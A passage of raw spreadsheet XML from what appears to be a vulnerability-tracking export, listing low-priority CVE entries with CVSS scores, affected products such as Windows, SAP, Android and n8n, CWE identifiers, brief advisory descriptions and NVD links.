t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53638</t></is></c></row><row r="1510"><c r="A1510" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1510" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1510" s="5" t="inlineStr"><is><t>CVE-2026-73019</t></is></c><c r="D1510" s="5" t="n"><v>4.3</v></c><c r="E1510" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1510" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1510" s="5" t="inlineStr" /><c r="H1510" s="5" t="n"><v>0.007</v></c><c r="I1510" s="5" t="inlineStr" /><c r="J1510" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K151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10" s="5" t="inlineStr" /><c r="M1510" s="5" t="inlineStr" /><c r="N1510" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1510" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1510" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1510" s="5" t="inlineStr" /><c r="R1510" s="5" t="inlineStr"><is><t>CWE-41</t></is></c><c r="S1510" s="5" t="inlineStr"><is><t>Improper resolution of path equivalence in Windows URL Moniker allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T1510" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73019</t></is></c></row><row r="1511"><c r="A1511" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1511" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1511" s="5" t="inlineStr"><is><t>CVE-2026-76962</t></is></c><c r="D1511" s="5" t="n"><v>4.3</v></c><c r="E1511" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1511" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1511" s="5" t="inlineStr" /><c r="H1511" s="5" t="n"><v>0.002</v></c><c r="I1511" s="5" t="inlineStr" /><c r="J1511" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1511" s="5" t="inlineStr" /><c r="L1511" s="5" t="inlineStr" /><c r="M1511" s="5" t="inlineStr" /><c r="N1511" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1511" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1511" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1511" s="5" t="inlineStr" /><c r="R1511" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1511" s="5" t="inlineStr"><is><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is></c><c r="T1511" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76962</t></is></c></row><row r="1512"><c r="A1512" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1512" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1512" s="5" t="inlineStr"><is><t>CVE-2026-76963</t></is></c><c r="D1512" s="5" t="n"><v>4.3</v></c><c r="E1512" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1512" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1512" s="5" t="inlineStr" /><c r="H1512" s="5" t="n"><v>0.002</v></c><c r="I1512" s="5" t="inlineStr" /><c r="J1512" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1512" s="5" t="inlineStr" /><c r="L1512" s="5" t="inlineStr" /><c r="M1512" s="5" t="inlineStr" /><c r="N1512" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1512" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1512" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1512" s="5" t="inlineStr" /><c r="R1512" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1512" s="5" t="inlineStr"><is><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is></c><c r="T1512" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76963</t></is></c></row><row r="1513"><c r="A1513" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1513" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1513" s="5" t="inlineStr"><is><t>CVE-2026-76977</t></is></c><c r="D1513" s="5" t="n"><v>4.3</v></c><c r="E1513" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1513" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1513" s="5" t="inlineStr" /><c r="H1513" s="5" t="n"><v>0.002</v></c><c r="I1513" s="5" t="inlineStr" /><c r="J1513" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1513" s="5" t="inlineStr" /><c r="L1513" s="5" t="inlineStr" /><c r="M1513" s="5" t="inlineStr" /><c r="N1513" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1513" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1513" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1513" s="5" t="inlineStr" /><c r="R1513" s="5" t="inlineStr"><is><t>CWE-1289</t></is></c><c r="S1513" s="5" t="inlineStr"><is><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is></c><c r="T1513" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76977</t></is></c></row><row r="1514"><c r="A1514" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1514" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1514" s="5" t="inlineStr"><is><t>CVE-2026-78455</t></is></c><c r="D1514" s="5" t="n"><v>4.3</v></c><c r="E1514" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1514" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1514" s="5" t="inlineStr" /><c r="H1514" s="5" t="n"><v>0.005</v></c><c r="I1514" s="5" t="inlineStr" /><c r="J1514" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K15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514" s="5" t="inlineStr" /><c r="M1514" s="5" t="inlineStr" /><c r="N1514" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1514" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1514" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1514" s="5" t="inlineStr" /><c r="R1514" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1514" s="5" t="inlineStr"><is><t>Out-of-bounds read in Xbox allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1514" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78455</t></is></c></row><row r="1515"><c r="A1515" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1515" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1515" s="5" t="inlineStr"><is><t>CVE-2026-78516</t></is></c><c r="D1515" s="5" t="n"><v>4.3</v></c><c r="E1515" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1515" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1515" s="5" t="inlineStr" /><c r="H1515" s="5" t="n"><v>0.005</v></c><c r="I1515" s="5" t="inlineStr" /><c r="J1515" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K151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15" s="5" t="inlineStr" /><c r="M1515" s="5" t="inlineStr" /><c r="N1515" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1515" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1515" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1515" s="5" t="inlineStr" /><c r="R1515" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1515" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Storage allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1515" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78516</t></is></c></row><row r="1516"><c r="A1516" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1516" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1516" s="5" t="inlineStr"><is><t>CVE-2026-79588</t></is></c><c r="D1516" s="5" t="n"><v>4.3</v></c><c r="E1516" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1516" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1516" s="5" t="inlineStr" /><c r="H1516" s="5" t="n"><v>0.001</v></c><c r="I1516" s="5" t="inlineStr" /><c r="J1516" s="5" t="inlineStr" /><c r="K1516" s="5" t="inlineStr" /><c r="L1516" s="5" t="inlineStr" /><c r="M1516" s="5" t="inlineStr" /><c r="N1516" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1516" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1516" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1516" s="5" t="inlineStr" /><c r="R1516" s="5" t="inlineStr"><is><t>CWE-319</t></is></c><c r="S1516" s="5" t="inlineStr"><is><t>U-speed WIFI4 N300 T1 Pro v1.0.0 is vulnerable to Cleartext transmission of administration credentials over HTTP.</t></is></c><c r="T1516" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79588</t></is></c></row><row r="1517"><c r="A1517" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1517" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1517" s="5" t="inlineStr"><is><t>CVE-2026-79603</t></is></c><c r="D1517" s="5" t="n"><v>4.3</v></c><c r="E1517" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1517" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1517" s="5" t="inlineStr" /><c r="H1517" s="5" t="n"><v>0.002</v></c><c r="I1517" s="5" t="inlineStr" /><c r="J1517" s="5" t="inlineStr" /><c r="K1517" s="5" t="inlineStr" /><c r="L1517" s="5" t="inlineStr" /><c r="M1517" s="5" t="inlineStr" /><c r="N1517" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1517" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1517" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1517" s="5" t="inlineStr" /><c r="R1517" s="5" t="inlineStr"><is><t>CWE-664</t></is></c><c r="S1517" s="5" t="inlineStr"><is><t>x86 PV guests can free memory pages while still keeping a stale TLB entry
pointing to them.  A TLB flush is only issued by Xen (if needed) when the
page is re-used.  Since it's possible for the page to be scrubbed ahead of
the TLB flush, there's a window where a PV guest can modify an already
scrubbed page.</t></is></c><c r="T1517" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79603</t></is></c></row><row r="1518"><c r="A1518" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1518" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1518" s="5" t="inlineStr"><is><t>CVE-2026-86736</t></is></c><c r="D1518" s="5" t="n"><v>4.3</v></c><c r="E1518" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1518" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1518" s="5" t="inlineStr" /><c r="H1518" s="5" t="n"><v>0.002</v></c><c r="I1518" s="5" t="inlineStr" /><c r="J1518" s="5" t="inlineStr" /><c r="K1518" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L1518" s="5" t="inlineStr" /><c r="M1518" s="5" t="inlineStr" /><c r="N1518" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1518" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1518" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1518" s="5" t="inlineStr" /><c r="R1518" s="5" t="inlineStr"><is><t>CWE-682</t></is></c><c r="S1518" s="5" t="inlineStr"><is><t>snipe-it before 8.7.0 contains an incorrect calculation vulnerability in checkout request handling that allows authenticated users to corrupt the assets.requests_counter through duplicate submissions and cancellations without active requests. Attackers can repeatedly call cancel endpoints without active requests to drive the counter negative, or submit duplicate checkout requests to inflate the counter, misrepresenting pending demand in the admin queue.</t></is></c><c r="T1518" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86736</t></is></c></row><row r="1519"><c r="A1519" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1519" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1519" s="5" t="inlineStr"><is><t>CVE-2026-86853</t></is></c><c r="D1519" s="5" t="n"><v>4.3</v></c><c r="E1519" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1519" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1519" s="5" t="inlineStr" /><c r="H1519" s="5" t="n"><v>0.002</v></c><c r="I1519" s="5" t="inlineStr" /><c r="J1519" s="5" t="inlineStr" /><c r="K1519" s="5" t="inlineStr" /><c r="L1519" s="5" t="inlineStr" /><c r="M1519" s="5" t="inlineStr" /><c r="N1519" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1519" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1519" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1519" s="5" t="inlineStr" /><c r="R1519" s="5" t="inlineStr"><is><t>CWE-451</t></is></c><c r="S1519" s="5" t="inlineStr"><is><t>A malicious webpage could repeatedly trigger external URL schemes, causing system prompts or external application launches. This could make Firefox for iOS temporarily unusable until the page is closed. This vulnerability was fixed in Firefox for iOS 155.1.</t></is></c><c r="T1519" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86853</t></is></c></row><row r="1520"><c r="A1520" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1520" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1520" s="5" t="inlineStr"><is><t>CVE-2026-86994</t></is></c><c r="D1520" s="5" t="n"><v>4.3</v></c><c r="E1520" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1520" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1520" s="5" t="inlineStr" /><c r="H1520" s="5" t="n"><v>0.002</v></c><c r="I1520" s="5" t="inlineStr" /><c r="J1520" s="5" t="inlineStr" /><c r="K1520" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1520" s="5" t="inlineStr" /><c r="M1520" s="5" t="inlineStr" /><c r="N1520" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1520" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1520" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1520" s="5" t="inlineStr" /><c r="R1520" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1520" s="5" t="inlineStr"><is><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is></c><c r="T1520" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86994</t></is></c></row><row r="1521"><c r="A1521" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1521" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1521" s="5" t="inlineStr"><is><t>CVE-2026-86995</t></is></c><c r="D1521" s="5" t="n"><v>4.3</v></c><c r="E1521" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1521" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1521" s="5" t="inlineStr" /><c r="H1521" s="5" t="n"><v>0.003</v></c><c r="I1521" s="5" t="inlineStr" /><c r="J1521" s="5" t="inlineStr" /><c r="K1521" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1521" s="5" t="inlineStr" /><c r="M1521" s="5" t="inlineStr" /><c r="N1521" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1521" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1521" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1521" s="5" t="inlineStr" /><c r="R1521" s="5" t="inlineStr"><is><t>CWE-22, CWE-73</t></is></c><c r="S1521" s="5" t="inlineStr"><is><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is></c><c r="T1521" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86995</t></is></c></row><row r="1522"><c r="A1522" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1522" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1522" s="5" t="inlineStr"><is><t>CVE-2026-12285</t></is></c><c r="D1522" s="5" t="n"><v>4</v></c><c r="E1522" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1522" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1522" s="5" t="inlineStr" /><c r="H1522" s="5" t="n"><v>0.001</v></c><c r="I1522" s="5" t="inlineStr" /><c r="J1522" s="5" t="inlineStr" /><c r="K1522" s="5" t="inlineStr" /><c r="L1522" s="5" t="inlineStr" /><c r="M1522" s="5" t="inlineStr" /><c r="N1522" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1522" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1522" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1522" s="5" t="inlineStr" /><c r="R1522" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1522"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522" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12285</t></is></c></row><row r="1523"><c r="A1523" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1523" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1523" s="5" t="inlineStr"><is><t>CVE-2026-80159</t></is></c><c r="D1523" s="5" t="n"><v>4</v></c><c r="E1523" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1523" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1523" s="5" t="inlineStr" /><c r="H1523" s="5" t="n"><v>0.001</v></c><c r="I1523" s="5" t="inlineStr" /><c r="J1523" s="5" t="inlineStr" /><c r="K1523" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1523" s="5" t="inlineStr" /><c r="M1523" s="5" t="inlineStr" /><c r="N1523" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1523" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1523" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1523" s="5" t="inlineStr" /><c r="R1523" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="S1523" s="5" t="inlineStr"><is><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is></c><c r="T1523" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80159</t></is></c></row><row r="1524"><c r="A1524" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1524" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1524" s="5" t="inlineStr"><is><t>CVE-2026-49895</t></is></c><c r="D1524" s="5" t="n"><v>3.5</v></c><c r="E1524" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1524" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1524" s="5" t="inlineStr" /><c r="H1524" s="5" t="n"><v>0.001</v></c><c r="I1524" s="5" t="inlineStr" /><c r="J1524" s="5" t="inlineStr" /><c r="K1524" s="5" t="inlineStr" /><c r="L1524" s="5" t="inlineStr" /><c r="M1524" s="5" t="inlineStr" /><c r="N1524" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1524" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1524" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1524" s="5" t="inlineStr" /><c r="R1524" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S1524" s="5" t="inlineStr"><is><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is></c><c r="T1524" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49895</t></is></c></row><row r="1525"><c r="A1525" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1525" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1525" s="5" t="inlineStr"><is><t>CVE-2026-69904</t></is></c><c r="D1525" s="5" t="n"><v>3.5</v></c><c r="E1525" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1525" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1525" s="5" t="inlineStr" /><c r="H1525" s="5" t="n"><v>0.006</v></c><c r="I1525" s="5" t="inlineStr" /><c r="J1525" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1525" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1525" s="5" t="inlineStr" /><c r="M1525" s="5" t="inlineStr" /><c r="N1525" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1525" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1525" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1525" s="5" t="inlineStr" /><c r="R1525" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1525" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1525" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69904</t></is></c></row><row r="1526"><c r="A1526" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1526" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1526" s="5" t="inlineStr"><is><t>CVE-2026-75726</t></is></c><c r="D1526" s="5" t="n"><v>3.5</v></c><c r="E1526" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1526" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1526" s="5" t="inlineStr" /><c r="H1526" s="5" t="n"><v>0.004</v></c><c r="I1526" s="5" t="inlineStr" /><c r="J1526" s="5" t="inlineStr" /><c r="K1526" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1526" s="5" t="inlineStr" /><c r="M1526" s="5" t="inlineStr" /><c r="N1526" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1526" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1526" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1526" s="5" t="inlineStr" /><c r="R1526" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S1526" s="5" t="inlineStr"><is><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is></c><c r="T1526" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75726</t></is></c></row><row r="1527"><c r="A1527" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1527" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1527" s="5" t="inlineStr"><is><t>CVE-2026-76960</t></is></c><c r="D1527" s="5" t="n"><v>3.5</v></c><c r="E1527" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1527" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1527" s="5" t="inlineStr" /><c r="H1527" s="5" t="n"><v>0.001</v></c><c r="I1527" s="5" t="inlineStr" /><c r="J1527" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1527" s="5" t="inlineStr" /><c r="L1527" s="5" t="inlineStr" /><c r="M1527" s="5" t="inlineStr" /><c r="N1527" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1527" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1527" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1527" s="5" t="inlineStr" /><c r="R1527" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1527"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27" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76960</t></is></c></row><row r="1528"><c r="A1528" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1528" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1528" s="5" t="inlineStr"><is><t>CVE-2026-76961</t></is></c><c r="D1528" s="5" t="n"><v>3.5</v></c><c r="E1528" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1528" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1528" s="5" t="inlineStr" /><c r="H1528" s="5" t="n"><v>0.001</v></c><c r="I1528" s="5" t="inlineStr" /><c r="J1528" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1528" s="5" t="inlineStr" /><c r="L1528" s="5" t="inlineStr" /><c r="M1528" s="5" t="inlineStr" /><c r="N1528" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1528" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1528" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1528" s="5" t="inlineStr" /><c r="R1528" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1528"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28" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76961</t></is></c></row><row r="1529"><c r="A1529" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1529" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1529" s="5" t="inlineStr"><is><t>CVE-2026-0054</t></is></c><c r="D1529" s="5" t="n"><v>3.3</v></c><c r="E1529" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1529" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1529" s="5" t="inlineStr" /><c r="H1529" s="5" t="n"><v>0.001</v></c><c r="I1529" s="5" t="inlineStr" /><c r="J1529" s="5" t="inlineStr" /><c r="K1529" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1529" s="5" t="inlineStr" /><c r="M1529" s="5" t="inlineStr" /><c r="N1529" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1529" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1529" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1529" s="5" t="inlineStr" /><c r="R1529" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1529" s="5" t="inlineStr"><is><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is></c><c r="T1529" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0054</t></is></c></row><row r="1530"><c r="A1530" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1530" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1530" s="5" t="inlineStr"><is><t>CVE-2026-28582</t></is></c><c r="D1530" s="5" t="n"><v>3.3</v></c><c r="E1530" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1530" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1530" s="5" t="inlineStr" /><c r="H1530" s="5" t="n"><v>0.001</v></c><c r="I1530" s="5" t="inlineStr" /><c r="J1530" s="5" t="inlineStr" /><c r="K1530" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1530" s="5" t="inlineStr" /><c r="M1530" s="5" t="inlineStr" /><c r="N1530" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1530" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1530" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1530" s="5" t="inlineStr" /><c r="R1530" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1530" s="5" t="inlineStr"><is><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is></c><c r="T1530" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28582</t></is></c></row><row r="1531"><c r="A1531" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1531" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1531" s="5" t="inlineStr"><is><t>CVE-2026-28622</t></is></c><c r="D1531" s="5" t="n"><v>3.3</v></c><c r="E1531" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1531" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1531" s="5" t="inlineStr" /><c r="H1531" s="5" t="n"><v>0.001</v></c><c r="I1531" s="5" t="inlineStr" /><c r="J1531" s="5" t="inlineStr" /><c r="K1531" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1531" s="5" t="inlineStr" /><c r="M1531" s="5" t="inlineStr" /><c r="N1531" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1531" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1531" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1531" s="5" t="inlineStr" /><c r="R1531" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1531" s="5" t="inlineStr"><is><t>In getQueryBuilderInternal of MediaProvider.java, there is a possible way to retrieve location metadata due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1531" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28622</t></is></c></row><row r="1532"><c r="A1532" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1532" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1532" s="5" t="inlineStr"><is><t>CVE-2026-28623</t></is></c><c 